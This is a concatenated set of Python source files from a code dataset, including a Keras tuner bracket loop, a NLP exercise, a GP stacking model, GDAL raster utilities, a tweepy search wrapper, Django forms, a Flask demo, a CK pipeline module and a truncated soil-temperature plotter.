self.config.num_batches\n\n while remaining_batches > 0:\n info('Budget: %s/%s - Loop %.2f/%.2f' %\n (self.epoch_budget_expensed, self.state.epoch_budget,\n remaining_batches, self.config.num_batches))\n\n # Last (fractional) loop\n if remaining_batches < 1.0:\n # Reduce the number of models for the last fractional loop\n model_sequence = self.config.partial_batch_epoch_sequence\n if model_sequence is None:\n break\n info('Partial Batch Model Sequence %s' % model_sequence)\n else:\n model_sequence = self.config.model_sequence\n\n # Generate N models, and perform the initial training.\n subsection('Generating %s models' % model_sequence[0])\n candidates = InstanceStatesCollection()\n num_models = model_sequence[0]\n\n for idx in tqdm(range(num_models),\n desc='Generating models',\n unit='model'):\n\n if self.state.dry_run:\n candidates.add(idx, None)\n else:\n instance = self.new_instance()\n if instance is not None:\n candidates.add(instance.state.idx, instance.state)\n\n if not candidates:\n info(\"No models were generated.\")\n break\n\n subsection(\"Training models.\")\n\n for bracket_idx, num_models in enumerate(model_sequence):\n num_epochs = self.config.delta_epoch_sequence[bracket_idx]\n total_num_epochs = self.config.epoch_sequence[bracket_idx]\n\n num_to_keep = 0\n if bracket_idx < len(model_sequence) - 1:\n num_to_keep = model_sequence[bracket_idx + 1]\n info(\"Running a bracket to reduce from %d to %d models \"\n \"in %d epochs\" %\n (num_models, num_to_keep, num_epochs))\n else:\n num_to_keep = model_sequence[bracket_idx]\n info(\"Running final bracket - %d models for %d epochs\" %\n (num_to_keep, num_epochs))\n\n 
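
Each bracket above trains the surviving models for the next epoch increment, drops early-stopped instances whose loss history is shorter than the epoch target, sorts by the objective, and keeps the top num_to_keep. The selection step reduces to a filter plus sort-and-slice; a minimal sketch over (model_id, objective, epochs_trained) triples, assuming lower objective is better (e.g. loss):

def select_survivors(instances, num_to_keep, epoch_target):
    # Drop early stops, then keep the num_to_keep best objectives.
    finished = [i for i in instances if i[2] >= epoch_target]
    return sorted(finished, key=lambda i: i[1])[:num_to_keep]

bracket = [('m1', 0.42, 9), ('m2', 0.17, 9), ('m3', 0.88, 9), ('m4', 0.25, 4)]
print(select_survivors(bracket, 2, epoch_target=9))
# [('m2', 0.17, 9), ('m1', 0.42, 9)]  (m4 is filtered as an early stop)
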
info('Budget: %s/%s - Loop %.2f/%.2f - Brackets %s/%s' %\n (self.epoch_budget_expensed, self.state.epoch_budget,\n remaining_batches, self.config.num_batches,\n bracket_idx + 1, self.config.num_brackets))\n\n self.epoch_budget_expensed += num_models * num_epochs\n\n candidates = self.bracket(candidates, num_to_keep, num_epochs,\n total_num_epochs, x, y, **kwargs)\n\n remaining_batches -= 1\n\n info('Final Budget Used: %s/%s' %\n (self.epoch_budget_expensed, self.state.epoch_budget))\n","sub_path":"kerastuner/tuners/ultraband/ultraband.py","file_name":"ultraband.py","file_ext":"py","file_size_in_byte":11884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"185654645","text":"# -*- coding: utf-8 -*-\n\n\n# 元素記号\n# \"Hi He Lied Because Boron Could Not Oxidize Fluorine.\n# New Nations Might Also Sign Peace Security Clause. Arthur King Can.\"\n# という文を単語に分解し,1, 5, 6, 7, 8, 9, 15, 16, 19番目の単語は先頭の\n# 1文字,それ以外の単語は先頭に2文字を取り出し,取り出した文字列から\n# 単語の位置(先頭から何番目の単語か)への\n# 連想配列(辞書型もしくはマップ型)を作成せよ.\n\n\nsentence = \"Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. Arthur King Can.\"\n\n#上のsentenceをwordごとに区切って並べる。\nwords = sentence.split(\" \")\n\n#上のwordsそれぞれから,と.を取り除く。\n# for word in words:\n# word_stripped = word.strip(\",.\")\n\n# made an empty dictionary to put key/value later.\ndict_w1 = {}\n\n# 先頭1文字の単語のリストを作って、それぞれの先頭1文字を上のdict_w1に入れる。\nfor i in [0,4,5,6,7,8,14,15,18]:\n #words[i]の先頭の1文字をw1にする。\n w1 = words[i][0]\n #[w1]は先頭の1文字。dict_w1はdictionary。i+1は何番目に出てくるか。\n #dict_w1[w1]は、例えばdict_w1[H]で、=1となる(Hi)。\n dict_w1[w1] = i+1\n# w2 = words[4][0]\n# w3 = words[5][0]\n# w4 = words[6][0]\n# w5 = words[7][0]\n# w6 = words[8][0]\n# w7 = words[14][0]\n# w8 = words[15][0]\n# w9 = words[18][0]\nprint(dict_w1)\n#{w1:1, w2:5, w3:6, w4:7, w5:8, w6:9, w7:15, w8:16, w9:19}\n\n#2,3,4,10,11,12,13,14,17,18,20\ndict_w2 = {}\n\nfor i in [1,2,3,9,10,11,11,12,13,16,17,19]:\n w2 = words[i][:2]\n dict_w2[w2] = i+1\nprint(dict_w2)\n# w10 = words[1][1]\n# w11= words[2][1]\n# w12 = words[3][1]\n# w13 = words[9][1]\n# w14 = words[10][1]\n# w15 = words[11][1]\n# w16 = words[12][1]\n# w17 = words[13][1]\n# w18= words[16][1]\n# w19= words[17][1]\n# w20= words[19][1]\n#\n# {w10:2, w11:3, w12:4, w13:10, w14:11, w15:12, w16:13, w17:14, w18:17, w19:18, w20:20}\n\n","sub_path":"yui/chapter01/knock04.py","file_name":"knock04.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"4849941","text":"# Load standard libaries\r\nimport copy\r\nimport dill\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom math import modf\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nfrom mdls.funs_gp import gp_wrapper, gp_real\r\n\r\n# di_model={'base':'rxgboost', 'nval':'168',\r\n# 'max_iter':'10', 'lr':'0.01', 'max_cg':'10000',\r\n# 'n_trees':'100', 'depth':'3', 'n_jobs':'7'}\r\n# self = model(encoder=enc_yX,di_model=di_model)\r\n# self.fit(Xtrain, ytrain)\r\nclass model():\r\n def __init__(self, encoder, di_model=None):\r\n self.encoder = encoder\r\n self.di_model = {'base':'xgboost', 'nval':168, # Number of validation points\r\n 'max_iter':250, 'lr':0.01, 'max_cg':10000} # defaults\r\n # Model arguments either strings, floats, ints, or not part of default (left as string)\r\n if di_model is not None:\r\n for k in di_model.keys():\r\n if k in self.di_model:\r\n try:\r\n val_k = float(di_model[k])\r\n frac, _ = modf(val_k)\r\n if frac == 0:\r\n 
val_k = int(val_k)\r\n self.di_model[k] = val_k\r\n except:\r\n assert isinstance(di_model[k],str)\r\n self.di_model[k] = di_model[k] \r\n else:\r\n self.di_model[k] = di_model[k] # Argument for base\r\n mclass = __import__('mdls.' + self.di_model['base'])\r\n self.base = getattr(getattr(mclass, self.di_model['base']), 'model')\r\n self.base = self.base(encoder=self.encoder, di_model=self.di_model)\r\n\r\n # X, y = Xtrain.copy(), ytrain.copy()\r\n def fit(self, X, y):\r\n ntot = len(X)\r\n assert ntot == len(y)\r\n nval = self.di_model['nval']\r\n lr = self.di_model['lr']\r\n max_iter = self.di_model['max_iter']\r\n max_cg = self.di_model['max_cg']\r\n # --- (i) Fit the baseline model --- #\r\n print('(i) Fitting baseline model')\r\n if nval > 0:\r\n X_train, y_train = X[:-nval], y[:-nval]\r\n #X_val, y_val = X[-nval:], y[-nval:]\r\n else:\r\n X_train, y_train = X, y\r\n #X_val, y_val = None, None\r\n self.base.fit(y=y_train, X=X_train)\r\n Eta, Ytil = self.base.predict(X=X, y=y)\r\n assert Eta.shape == Ytil.shape\r\n self.k = Ytil.shape[1]\r\n # Fill missing values with predicted scores\r\n Ytil = np.where(np.isnan(Ytil),Eta, Ytil)\r\n # Normalize the Y's\r\n self.enc_Y = StandardScaler().fit(Ytil)\r\n Eta = self.enc_Y.transform(Eta)\r\n Ytil = self.enc_Y.transform(Ytil)\r\n # Split the nval\r\n if nval > 0:\r\n Eta_val, Ytil_val = Eta[-nval:], Ytil[-nval:]\r\n Eta_train, Ytil_train = Eta[:-nval], Ytil[:-nval]\r\n else:\r\n Eta_val, Ytil_val = None, None\r\n\r\n # --- (ii) GP Stacker --- #\r\n print('(ii) Fitting GP')\r\n self.gp = gp_wrapper(gp_class=gp_real, train_x=Eta_train, train_y=Ytil_train, tt='list')\r\n self.gp.fit(x_val=Eta_val, y_val=Ytil_val, max_iter=max_iter, max_cg=max_cg, lr=lr)\r\n # Refit baseline model\r\n print('Refitting baseline')\r\n self.base.fit(y=y, X=X)\r\n self.update_Xy(Xnew=X, ynew=y)\r\n\r\n # Xnew=X.copy(); ynew=y.copy()\r\n def update_Xy(self, Xnew, ynew):\r\n print('Updating GP X/Y')\r\n # (i) New pandas df to get yhats from xgboost\r\n Eta, Ytil = self.base.predict(X=Xnew, y=ynew)\r\n Ytil = np.where(np.isnan(Ytil), Eta, Ytil)\r\n self.enc_Y.fit(Ytil)\r\n Eta = self.enc_Y.transform(Eta)\r\n Ytil = self.enc_Y.transform(Ytil)\r\n # (ii) Update X/y within GP\r\n tmp_di = self.gp.model.state_dict()\r\n self.gp = gp_wrapper(gp_class=gp_real, train_x=Eta, train_y=Ytil, tt='list')\r\n self.gp.model.load_state_dict(tmp_di)\r\n \r\n\r\n # X = X_now.copy(); #Xtrain[-(lag+2):].copy()\r\n def predict(self, X):\r\n # Get predictions from baseline model\r\n Eta = self.base.predict(X=X)\r\n assert Eta.shape[1] == self.k\r\n # Normalize and tensorize\r\n Eta = self.enc_Y.transform(Eta)\r\n # Get predictions from multitask GP\r\n mu, se = self.gp.predict(Eta)\r\n df_mu = pd.DataFrame(self.enc_Y.inverse_transform(mu)).assign(tt='pred')\r\n df_se = pd.DataFrame(self.enc_Y.scale_ * se).assign(tt='se')\r\n df = pd.concat([df_mu,df_se],0).rename_axis('idx').reset_index()\r\n df = df.melt(['idx','tt'],None,'lead').pivot_table('value',['lead','idx'],'tt')\r\n df = df.reset_index().assign(lead=lambda x: x.lead+1)\r\n if df.idx.max() == 0:\r\n df.drop(columns = 'idx', inplace=True)\r\n return df\r\n\r\n def pickle_me(self, path):\r\n with open(path, 'wb') as file:\r\n dill.dump(self, file)\r\n\r\n def copy(self):\r\n return copy.deepcopy(self)\r\n\r\n# with open(path, 'rb') as file:\r\n# tmp = dill.load(file)\r\n# tmp.predict(X_now.copy())\r\n\r\n# self.gp = gp_wrapper(gp_class=mgp_real, train_x=Yhat, train_y=Ytil, tt='multi')\r\n# self.gp = gp_wrapper(gp_class=mgp_batch, 
train_x=Yhat, train_y=Ytil, tt='multi')\r\n# self.gp = gp_wrapper(gp_class=gp_real, train_x=Yhat, train_y=Ytil[:,12], tt='univariate')\r\n\r\n\r\n\r\n # # tmp = pd.concat([self.res_train.drop(columns=['se','idx']), res.assign(tt='test')])\r\n # # tmp = tmp.reset_index(None, True).rename_axis('idx').reset_index()\r\n # # from plotnine import *\r\n # # gg_torch = (ggplot(tmp, aes(x='idx', y='mu', color='tt')) + theme_bw() + geom_line() +\r\n # # geom_vline(xintercept=ntrain) + geom_ribbon(aes(ymin='lb', ymax='ub'), alpha=0.5) +\r\n # # geom_point(aes(x='idx', y='y'), color='black', size=0.5, alpha=0.5))\r\n # # gg_torch.save(os.path.join(dir_figures, 'test.png'),width=12,height=7)\r\n\r\n# for name, param in self.gp.model.named_parameters():\r\n# with torch.no_grad():\r\n# print('param: %s, value: %s' % (name, param.flatten()))\r\n","sub_path":"mdls/gp_stacker.py","file_name":"gp_stacker.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"298604969","text":"import time\n\ninput_words_list =[[\"leave\", [\"leav\", \"eavt\", \"eaaaaaaaaaaaaaaaaaaaaaaaaa\"]],\n [\"reset\", \"rest\"],\n [\"dragoon\", \"dragon\"],\n [\"leave\", \"leave\"],\n [\"sleet\", \"lets\"],\n [\"skiff\", \"ski\"]]\n\n\ndef list_elements_len(*args):\n elements_len = map(len, *args)\n return elements_len\n\n\ndef funnel(word1, *word2):\n if isinstance(word2[0], list):\n word2 = word2[0]\n elif isinstance(word2[0], str):\n word2 = list(word2)\n if len(word1)-1 in list_elements_len(word2):\n for letter_position, _ in enumerate(word1):\n word1_without_letter = word1[:letter_position]+word1[letter_position+1:]\n if word1_without_letter in word2:\n return True\n return False\n\n\ndef duration(func):\n def wrapper(*wor):\n start = time.time()\n func(*wor)\n end = time.time()\n print((end-start))\n return wrapper\n\n\n@duration\ndef my_solution(*input_words):\n for pair in input_words:\n print(funnel(*pair))\n\n\nif __name__ == \"__main__\":\n my_solution(*input_words_list)\n","sub_path":"word_funnel.py","file_name":"word_funnel.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"338962743","text":"import os\r\nimport ogr\r\nimport gdal\r\nimport numpy as np\r\nimport pymannkendall as mk\r\nfrom clip import clip_with_shp\r\nfrom collections import Iterable\r\n\r\n\r\nGRIB_NODATA = -1.797693e+308\r\ncreation = ['TILED=YES', 'COMPRESS=DEFLATE',\r\n 'ZLEVEL=3', 'PREDICTOR=1', 'BIGTIFF=YES']\r\n\r\n\r\n# mann kendall test\r\ndef mk_test(arr):\r\n return mk.original_test(arr).z\r\n\r\n\r\ndef create_tif(filename, ras, values):\r\n if isinstance(ras, str):\r\n ds = gdal.Open(ras)\r\n else:\r\n ds = ras\r\n ras = ds.GetDescription()\r\n\r\n if os.path.isdir(os.path.dirname(filename)):\r\n out_file = filename\r\n else:\r\n out_file = os.path.join(os.path.dirname(ras), filename)\r\n\r\n if os.path.exists(out_file):\r\n return\r\n\r\n count = values.shape[2] if len(values.shape) > 2 else 1\r\n out_ds = gdal.GetDriverByName('GTiff').Create(\r\n out_file, ds.RasterXSize, ds.RasterYSize, count, gdal.GDT_Float64, creation)\r\n\r\n out_ds.SetProjection(ds.GetProjection())\r\n out_ds.SetGeoTransform(ds.GetGeoTransform())\r\n for c in range(1, 1 + count):\r\n out_band = out_ds.GetRasterBand(c)\r\n out_band.SetNoDataValue(GRIB_NODATA)\r\n if len(values.shape) > 2:\r\n out_band.WriteArray(values[:, :, c - 1])\r\n else:\r\n out_band.WriteArray(values)\r\n 
out_band = None\r\n out_ds = None\r\n\r\n\r\ndef proj_ds(ras, shp, clip_shp=None):\r\n if isinstance(ras, str):\r\n ds = gdal.Open(ras)\r\n else:\r\n ds = ras\r\n ras = ds.GetDescription()\r\n\r\n out_file = os.path.join(os.path.dirname(\r\n ras), os.path.splitext(os.path.basename(ras))[0] + '_proj.tif')\r\n if os.path.exists(out_file):\r\n return\r\n\r\n if clip_shp is not None:\r\n clip_ds = clip_with_shp(ras, clip_shp,\r\n out_file='/vsimem/_clip.tif',\r\n rasterize_option=['ALL_TOUCHED=False'])\r\n else:\r\n clip_ds = ds\r\n outDataSet = ogr.Open(shp)\r\n srs = outDataSet.GetLayer().GetSpatialRef()\r\n\r\n option = gdal.WarpOptions(creationOptions=creation,\r\n resampleAlg=gdal.GRA_Average,\r\n multithread=True, dstSRS=srs)\r\n gdal.Warp(out_file, clip_ds, options=option)\r\n\r\n\r\ndef deal_calc(ras, out_path, plus=None, multi=None, **kwargs):\r\n out_file = os.path.join(out_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n if os.path.exists(out_file):\r\n return\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, **kwargs)\r\n out_ds = gdal.Warp(out_file, ras, options=option)\r\n for c in range(1, 1 + out_ds.RasterCount):\r\n out_band = out_ds.GetRasterBand(c)\r\n no_data = out_band.GetNoDataValue()\r\n values = out_band.ReadAsArray()\r\n if plus is not None:\r\n values[values != no_data] = values[values != no_data] + plus\r\n if multi is not None:\r\n if isinstance(multi, Iterable):\r\n values[values != no_data] = \\\r\n values[values != no_data] * multi[c - 1]\r\n else:\r\n values[values != no_data] = values[values != no_data] * multi\r\n\r\n out_band.WriteArray(values)\r\n\r\n\r\ndef deal_divide(filename, ds_up, ds_down, ** kwargs):\r\n if isinstance(ds_up, str):\r\n ras_up = ds_up\r\n ds_up = gdal.Open(ds_up)\r\n else:\r\n ras_up = ds_up.GetDescription()\r\n\r\n if isinstance(ds_down, str):\r\n ds_down = gdal.Open(ds_down)\r\n\r\n if os.path.isdir(os.path.dirname(filename)):\r\n out_file = filename\r\n else:\r\n out_file = os.path.join(os.path.dirname(ras_up), filename)\r\n\r\n if os.path.exists(out_file):\r\n return\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n **kwargs, creationOptions=creation)\r\n ds = gdal.Warp(out_file, ds_up, options=option)\r\n ds_up = gdal.Warp('/vsimem/_1.tif', ds_up, options=option)\r\n ds_down = gdal.Warp('/vsimem/_2.tif', ds_down, options=option)\r\n\r\n # change net radiation\r\n col = ds.RasterCount\r\n for c in range(1, col + 1):\r\n band_up = ds_up.GetRasterBand(c)\r\n band_down = ds_down.GetRasterBand(c)\r\n band = ds.GetRasterBand(c)\r\n\r\n up = band_up.ReadAsArray()\r\n down = band_down.ReadAsArray()\r\n\r\n mask = up != band_up.GetNoDataValue()\r\n net = np.copy(up)\r\n net[mask] = up[mask] / down[mask]\r\n band.WriteArray(net)\r\n\r\n # destroy dataset\r\n band = None\r\n ds = None\r\n\r\n\r\ndef deal_cover(filename, ds_up, ds_down, ** kwargs):\r\n if isinstance(ds_up, str):\r\n ras_up = ds_up\r\n ds_up = gdal.Open(ds_up)\r\n else:\r\n ras_up = ds_up.GetDescription()\r\n\r\n if isinstance(ds_down, str):\r\n ds_down = gdal.Open(ds_down)\r\n\r\n if os.path.isdir(os.path.dirname(filename)):\r\n out_file = filename\r\n else:\r\n out_file = os.path.join(os.path.dirname(ras_up), filename)\r\n\r\n if os.path.exists(out_file):\r\n return\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n **kwargs, creationOptions=creation)\r\n ds = gdal.Warp(out_file, ds_up, options=option)\r\n\r\n # 
change net radiation\r\n col = ds.RasterCount\r\n for c in range(1, col + 1):\r\n band_up = ds_up.GetRasterBand(c)\r\n band_down = ds_down.GetRasterBand(c)\r\n band = ds.GetRasterBand(c)\r\n\r\n up = band_up.ReadAsArray()\r\n down = band_down.ReadAsArray()\r\n\r\n mask = up == band_up.GetNoDataValue()\r\n net = np.copy(down)\r\n net[mask] = band_up.GetNoDataValue()\r\n band.SetNoDataValue(band_up.GetNoDataValue())\r\n band.WriteArray(net)\r\n\r\n # destroy dataset\r\n band = None\r\n ds = None\r\n","sub_path":"mk_test.py","file_name":"mk_test.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"145465226","text":"import time\n\n\ndef get_time_process(target_function):\n start_time = time.time()\n target_function()\n end_time = time.time()\n\n return end_time - start_time\n\n\ndef measure_graph_size(f, *args):\n g = f.get_concrete_function(*args).graph\n print(\"{}({}) contains {} nodes in its graph\".format(\n f.__name__, ', '.join(map(str, args)), len(g.as_graph_def().node)\n ))\n return f\n\n","sub_path":"utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"71329329","text":"import unittest\r\nfrom interval import *\r\nfrom interval.interval_functions import *\r\n\r\n\r\nclass mergeIntervals_test(unittest.TestCase):\r\n \"\"\"Test mergeIntervals\"\"\"\r\n\r\n def overlapping(self):\r\n self.assertEqual(mergeIntervals('(1,5]', '[2,6]').__repr__(), '[2, 6]') # check the result\r\n\r\n def within(self):\r\n self.assertEqual(mergeIntervals('(1,8)', '[4,6]').__repr__(), '[2, 7]') # check the result\r\n\r\n def non_overlapping(self):\r\n with self.assertRaises('No Overlapping'):\r\n mergeIntervals('(0,3)', '[9,15)') # check the result\r\n\r\nclass mergeOverlapping_test(unittest.TestCase):\r\n \"\"\"Test mergeOverlapping\"\"\"\r\n\r\n def basic(self): # check if the function is working\r\n self.string1 = '[1,5), [2,6), (8,10], [8,18]'\r\n self.result1 = ['[1,5]', '[8,18]']\r\n self.string2 = '(0,4), [6,15)'\r\n self.result2 = ['[1,3]', '[6,14]']\r\n\r\n def overlapping_test(self): # check the overlapping case\r\n result = mergeOverlapping(self.string1)\r\n self.assertEqual(len(result),len(self.result1)) # check if the lengths of two list equal\r\n for i in range(0,len(result)):\r\n self.assertEqual(result[i].__repr__(), self.result1[i].__repr__()) # check if elements with same indexes\r\n # are the same\r\n\r\n def non_overlapping_test(self): # check the non_overlapping_case\r\n result_non_overlapping = mergeOverlapping(self.string2)\r\n for i in range(0,len(result_non_overlapping)):\r\n self.assertEqual(result_non_overlapping[i].__repr__(), self.result2[i].__repr__())\r\n # check if elements with same indexes are the same\r\n\r\n\r\nclass insert_test(unittest.TestCase):\r\n \"\"\"Test insert\"\"\"\r\n\r\n def basic(self): # check if the function is working\r\n self.string1 = '[1,3], [6,9]'\r\n self.inserted_interval1 = '[2,5]'\r\n self.result1 = ['[1,9]']\r\n self.string2 = '[1,2], (3,5), [6,7), (8,10], [12,16]'\r\n self.inserted_interval2 = '[4,9]'\r\n self.result2 = ['[1,2]', '[4,10]', '[12,16]']\r\n\r\n def test_insert(self): # check the function in deeper environment\r\n insert_output1 = insert(self.string1, self.inserted_interval1)\r\n insert_output2 = insert(self.string2, self.inserted_interval2)\r\n self.assertEqual(len(insert_output1),len(self.result1)) # check if 
the lengths of two list equal\r\n self.assertEqual(len(insert_output2),len(self.result2))\r\n for i in range(0,len(insert_output1)):\r\n self.assertEqual(insert_output1[i].__repr__(), self.result1[i].__repr__())\r\n self.assertEqual(insert_output2[i].__repr__(), self.result2[i].__repr__())\r\n # check if elements with same indexes are the same\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"wl1162/unittest.py","file_name":"unittest.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"633167687","text":"from collections import namedtuple\n\nAlternative = namedtuple(\"Alternative\", (\"name\", \"code\", \"access\"))\n\n\nclass DictionaryAggregator(object):\n def __init__(self, master_dict, choices):\n self.master = master_dict\n self.choices = choices\n\n def lookup_strings(self, stringset, preferred_language):\n ss = set(stringset)\n\n alt = self.choices.get(preferred_language)\n if not alt:\n return self.master.lookup_strings(ss)\n\n stage1 = alt.access.lookup_strings(ss)\n stage2 = self.master.lookup_strings(ss - set(stage1.keys()))\n stage2.update(stage1)\n\n return stage2\n","sub_path":"captain/dict_aggregator.py","file_name":"dict_aggregator.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"407432321","text":"#!/usr/bin/env python\n\n__author__ = \"bunkdeath\"\n__date__ = \"$Mar 10, 2012 8:05:18 AM$\"\n\nimport tweepy\nimport config as setting\nfrom Parser import TweetParser\n\n\nclass TwitterSearch(object):\n def __init__(self, keyword=None, count=10):\n self.keyword = keyword\n self.count = count\n\n self.auth = tweepy.OAuthHandler(setting.CONSUMER_KEY, setting.CONSUMER_SECRET)\n self.auth.secure = True\n self.auth.set_access_token(setting.ACCESS_TOKEN, setting.ACCESS_TOKEN_SECRET)\n self.api = tweepy.API(self.auth)\n\n self.parser = TweetParser()\n\n def search(self, keyword, count=10):\n if not self.keyword:\n self.keyword = keyword\n\n if count != 10:\n self.count = count\n\n tweets = self.api.search(self.keyword, count=self.count)\n return self.parser.parse_class(tweets)\n","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"295964762","text":"from django.forms import ModelForm\nfrom .models import BookOrder\n\n\nclass BookOrderForm(ModelForm):\n\tclass Meta:\n\t\tmodel = BookOrder\n\t\tfields = [\n\t\t\t'date_order',\n\t\t\t'amount',\n\t\t\t'bookstore'\n\t\t]\n\n\t\tlabels = {\n\t\t\t'date_order': 'ວັນເດືອນປີສັ່ງຊື້ປື້ມ',\n\t\t\t'amount': 'ຈຳນວນ',\n\t\t\t'bookstore': 'ຮ້ານຂາຍປື້ມ',\n\t\t}","sub_path":"django_all/bookorder/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"613780424","text":"#\n# Collective Knowledge (pipeline demo)\n#\n# See CK LICENSE.txt for licensing details\n# See CK COPYRIGHT.txt for copyright details\n#\n# Developer: Grigori Fursin, Grigori.Fursin@cTuning.org, http://fursin.net\n#\n\ncfg={} # Will be updated by CK (meta description of this module)\nwork={} # Will be updated by CK (temporal data)\nck=None # Will be updated by CK (initialized CK kernel) \n\n# Local settings\n\n##############################################################################\n# Initialize module\n\ndef 
init(i):\n \"\"\"\n\n Input: {}\n\n Output: {\n return - return code = 0, if successful\n > 0, if error\n (error) - error text if return > 0\n }\n\n \"\"\"\n return {'return':0}\n\n##############################################################################\n# run pipeline\n\ndef pipeline(i):\n \"\"\"\n Input: {\n (cmd) - cmd\n (compiler_vars) - will substitute dummies $#VAR#$ in cmd\n (compiler_flags) - assemble into string and substitute $#compiler_flags#$\n }\n\n Output: {\n return - return code = 0, if successful\n > 0, if error\n (error) - error text if return > 0\n }\n\n \"\"\"\n\n import json\n import os\n\n o=i.get('out','')\n\n cmd=i.get('cmd','')\n\n cpu_freq=str(i.get('cpu_freq',''))\n gpu_freq=str(i.get('gpu_freq',''))\n\n cv=i.get('compiler_vars',{})\n cf=i.get('compiler_flags',{})\n\n if o=='con':\n ck.out('')\n ck.out(' Pipeline started')\n ck.out('')\n ck.out(' Input \"compiler_vars\" ='+json.dumps(cv))\n ck.out(' Input \"compiler_vars\" ='+json.dumps(cv))\n ck.out(' Input \"cpu_freq\" ='+cpu_freq)\n ck.out(' Input \"gpu_freq\" ='+gpu_freq)\n ck.out(' Original CMD ='+cmd)\n ck.out('')\n\n cflags=''\n for c in cf:\n cx='##compiler_flags#'+c\n cc=cf[c]\n if cc!='':\n if cflags!='': cflags+=' '\n cflags+=str(cc)\n\n cmd=cmd.replace('$#cflags#$', cflags)\n\n cmd=cmd.replace('$#cpu_freq#$', cpu_freq)\n cmd=cmd.replace('$#gpu_freq#$', gpu_freq)\n\n for q in cv:\n qq=cv[q]\n cmd=cmd.replace('$#'+q+'#$', str(qq)) \n\n if o=='con':\n ck.out('Prepared CMD:')\n ck.out('')\n ck.out(cmd)\n\n ck.out('')\n ck.out('Executing:')\n ck.out('')\n\n lcmd=cmd.split('\\n')\n for l in lcmd:\n os.system(l.strip())\n\n return {'return':0}\n","sub_path":"module/pipeline.cmd/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"233775732","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/soynlp/postagger/tagset/soy.py\n# Compiled at: 2018-04-10 05:49:44\n# Size of source mod 2**32: 276 bytes\ntagset = {'Noun':'명사', \n 'Pronoun':'대명사', \n 'Numeral':'수사', \n 'Verb':'동사', \n 'Adjective':'형용사', \n 'Determiner':'관형사', \n 'Adverb':'부사', \n 'Exclamation':'감탄사', \n 'Josa':'조사', \n 'Symbol':'기호'}","sub_path":"pycfiles/soynlp-0.0.493-py3.7/soy.cpython-37.py","file_name":"soy.cpython-37.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"377581500","text":"#!/usr/local/bin/python3\n\nfrom flask import Flask, jsonify\nimport json\n\napp = Flask(__name__)\n\n@app.route('/')\n\ndef home():\n print('Minha nossa!')\n #return 'Você acessou esta magnifica API'\n #return jsonify({'status' : 'Running...'})\n return json.dumps({'status' : 'Running...'})\n\napp.run(host='0.0.0.0', debug=True)\n","sub_path":"02_app.py","file_name":"02_app.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"105440223","text":"\"\"\"4 inch soil temps\"\"\"\nimport datetime\nimport calendar\n\nfrom pyiem import util\nfrom pyiem.network import Table as NetworkTable\nfrom pyiem.datatypes import temperature\n\nXREF = {\n 'AEEI4': 'A130209',\n 'BOOI4': 'A130209',\n 'CAMI4': 'A138019',\n 'CHAI4': 'A131559',\n 'CIRI4': 'A131329',\n 'CNAI4': 'A131299',\n 'CRFI4': 'A131909',\n 'DONI4': 
'A138019',\n 'FRUI4': 'A135849',\n 'GREI4': 'A134759',\n 'KNAI4': 'A134309',\n 'NASI4': 'A135879',\n 'NWLI4': 'A138019',\n 'OKLI4': 'A134759',\n 'SBEI4': 'A138019',\n 'WMNI4': 'A135849',\n 'WTPI4': 'A135849'}\n\n\ndef get_description():\n \"\"\" Return a dict describing how to call this plotter \"\"\"\n desc = dict()\n desc['description'] = \"\"\"This chart presents daily timeseries of 4 inch\n soil temperatures.\"\"\"\n today = datetime.date.today()\n desc['arguments'] = [\n dict(type='networkselect', name='station', network='ISUSM',\n default='BOOI4', label='Select Station:'),\n dict(type='year', default=today.year, min=1988, name='year',\n label='Year to Highlight')\n ]\n return desc\n\n\ndef plotter(fdict):\n \"\"\" Go \"\"\"\n import matplotlib\n matplotlib.use('agg')\n import matplotlib.pyplot as plt\n pgconn = util.get_dbconn('isuag')\n cursor = pgconn.cursor()\n\n today = datetime.date.today()\n nt = NetworkTable(\"ISUSM\")\n oldnt = 